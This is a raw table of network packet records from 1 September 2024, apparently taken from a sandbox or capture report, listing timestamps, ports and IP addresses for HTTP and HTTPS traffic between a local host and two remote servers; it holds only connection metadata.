Sep 1, 2024 18:27:51.390161991 CEST	80	56164	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:51.392841101 CEST	80	56165	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:51.392918110 CEST	56165	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:51.393023014 CEST	56165	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:51.393035889 CEST	56165	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:51.397842884 CEST	80	56165	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:51.397852898 CEST	80	56165	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:52.654377937 CEST	80	56165	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:52.654968023 CEST	80	56165	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:52.655323982 CEST	56165	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:52.655375957 CEST	56165	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:52.657896042 CEST	56166	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:52.660121918 CEST	80	56165	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:52.662657022 CEST	80	56166	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:52.662724018 CEST	56166	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:52.662849903 CEST	56166	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:52.662873030 CEST	56166	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:52.667913914 CEST	80	56166	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:52.667923927 CEST	80	56166	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:53.914314032 CEST	80	56166	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:53.914977074 CEST	80	56166	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:53.916894913 CEST	56166	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:53.927563906 CEST	56166	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:53.932347059 CEST	80	56166	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:54.105206966 CEST	56167	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:54.110200882 CEST	80	56167	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:54.110274076 CEST	56167	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:54.110460043 CEST	56167	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:54.110539913 CEST	56167	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:54.115221024 CEST	80	56167	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:54.115317106 CEST	80	56167	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:55.376424074 CEST	80	56167	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:55.377063990 CEST	80	56167	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:55.377151966 CEST	56167	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:55.377276897 CEST	56167	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:55.382201910 CEST	80	56167	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:55.387171984 CEST	56168	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:55.391997099 CEST	80	56168	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:55.392059088 CEST	56168	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:55.392174959 CEST	56168	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:55.392190933 CEST	56168	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:55.396886110 CEST	80	56168	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:55.397088051 CEST	80	56168	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:56.666378021 CEST	80	56168	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:56.667599916 CEST	80	56168	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:56.670804024 CEST	56168	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:56.670888901 CEST	56168	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:56.675806999 CEST	80	56168	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:56.703352928 CEST	56170	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:56.708185911 CEST	80	56170	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:56.710793972 CEST	56170	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:56.714131117 CEST	56170	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:56.714149952 CEST	56170	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:56.718961954 CEST	80	56170	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:56.719049931 CEST	80	56170	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:57.953836918 CEST	80	56170	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:57.953855991 CEST	80	56170	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:57.953912020 CEST	56170	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:57.954216003 CEST	56170	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:57.959305048 CEST	80	56170	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:58.023581982 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.023624897 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.023679972 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.024148941 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.024161100 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.525655985 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.525749922 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.527254105 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.527262926 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.527492046 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.536937952 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.580501080 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.652539968 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.652585030 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.652620077 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.652753115 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.652779102 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.652785063 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.652807951 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.652829885 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.652836084 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.652852058 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.653789997 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.654076099 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.654772997 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.654778957 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.657804012 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.657849073 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.657854080 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.658766985 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.658799887 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.742953062 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.742985964 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.743012905 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.743035078 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.743045092 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.743119955 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.747709036 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.747737885 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.747756004 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.747765064 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.747805119 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.747905970 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.752718925 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.752752066 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.752768993 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.752774000 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.752824068 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.757195950 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.757246017 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.757481098 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.757488966 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.757515907 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.757570982 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.757575989 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.762341976 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.762371063 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.762389898 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.762393951 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.762433052 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.762437105 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.767241001 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.767266989 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.767281055 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.767287016 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.767328024 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.771728039 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.772325039 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.772367001 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.772416115 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.772422075 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.774770975 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.786457062 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.833558083 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.833610058 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.833616018 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.838563919 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.838625908 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.838632107 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.838769913 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.843108892 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.843116045 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.843158960 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.847913027 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.847973108 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.848189116 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.848242998 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.853003979 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.853074074 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.857525110 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.857601881 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.862389088 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.862432003 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.862442970 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.862447023 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.862463951 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.862482071 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.862485886 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.862509012 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.862528086 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.862867117 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.862899065 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.862915039 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.862919092 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.862927914 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.862941027 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.862958908 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.862962008 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.863712072 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.863739967 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.863789082 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.863795042 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.924099922 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.924432993 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.924500942 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.924509048 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.924629927 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.924695015 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.924700022 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.925431013 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.925479889 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.925484896 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.926039934 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.926095963 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.926100969 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.926222086 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.926228046 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.926270008 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.926893950 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.926942110 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.927056074 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.927104950 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.927757025 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.927807093 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.927903891 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.927953005 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.928653002 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.928704977 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.929554939 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.929621935 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.929733038 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.929786921 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.930366993 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.930419922 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.930634975 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.930675983 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.931447029 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.931492090 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.931762934 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.931818962 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.932513952 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.932559013 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.932706118 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.932748079 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.933396101 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.933434010 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.933599949 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.933648109 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.934168100 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.934212923 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.934431076 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.934484005 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.935041904 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.935085058 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.935206890 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.935247898 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.935971022 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.936019897 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.936155081 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.936209917 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.936568022 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.936611891 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.936749935 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.936805010 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.968022108 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.968077898 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:58.968182087 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:58.968231916 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.014614105 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.014801025 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.014852047 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.014908075 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.015192986 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.015239954 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.015533924 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.015568018 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.015580893 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.015585899 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.015609980 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.016196966 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.016223907 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.016248941 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.016253948 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.016282082 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.016813040 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.016839027 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.016866922 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.016875029 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.016897917 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.017498970 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.017533064 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.017544031 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.017548084 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.017564058 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.017579079 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.017617941 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.017621994 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.017661095 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.018464088 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.018496037 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.018520117 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.018522978 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.018531084 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.018579006 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.019376040 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.019406080 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.019423008 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.019428015 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.019434929 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.019455910 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.019476891 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.019479990 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.019520998 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.020247936 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.020279884 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.020298004 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.020302057 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.020311117 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.020323038 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.020334005 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.020338058 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.020365000 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.021261930 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.021295071 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.021322012 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.021339893 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.021346092 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.021368027 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.021389961 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.022031069 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.022059917 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.022079945 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.022083044 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.022090912 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.022110939 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.022110939 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.022131920 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.022136927 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.022160053 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.022177935 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.022907019 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.022969007 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.058437109 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.058491945 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.058779955 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.058823109 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.105480909 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.105575085 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.105633974 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.105645895 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.105658054 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.106035948 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.106064081 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.106081009 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.106086016 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.106098890 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.106420994 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.106466055 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.106472015 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.106621981 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.106662035 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:27:59.106671095 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:27:59.106674910 CEST	443	56171	84.32.84.144	192.168.2.4
